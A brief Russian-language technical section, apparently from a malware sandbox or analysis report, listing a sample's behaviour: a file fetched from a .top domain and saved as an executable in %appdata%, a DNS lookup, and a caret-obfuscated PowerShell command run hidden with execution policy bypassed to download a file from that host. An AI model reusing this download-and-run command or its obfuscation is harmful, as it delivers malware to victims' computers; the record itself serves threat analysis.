Техническая информация
- http://mondayhelthc.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "PowE^RshELl.^e^xE -ExeC^U^t^ionP^oLic^y BYpA^Ss -n^OP^Ro^fILE -Wind^O^WS^ty^l^E Hi^DD^eN (new-OBjEcT SYSte^M^.NE^t^.W^E^bc^Li^eN^t).d^oWNlOAdfi^lE^(^'http://mondayhelthc.top/read....
- DNS ASK mo####helthc.top
- '<SYSTEM32>\cmd.exe' /C "PowE^RshELl.^e^xE -ExeC^U^t^ionP^oLic^y BYpA^Ss -n^OP^Ro^fILE -Wind^O^WS^ty^l^E Hi^DD^eN (new-OBjEcT SYSte^M^.NE^t^.W^E^bc^Li^eN^t).d^oWNlOAdfi^lE^(^'http://mondayhelthc.top/read....' (со скрытым окном)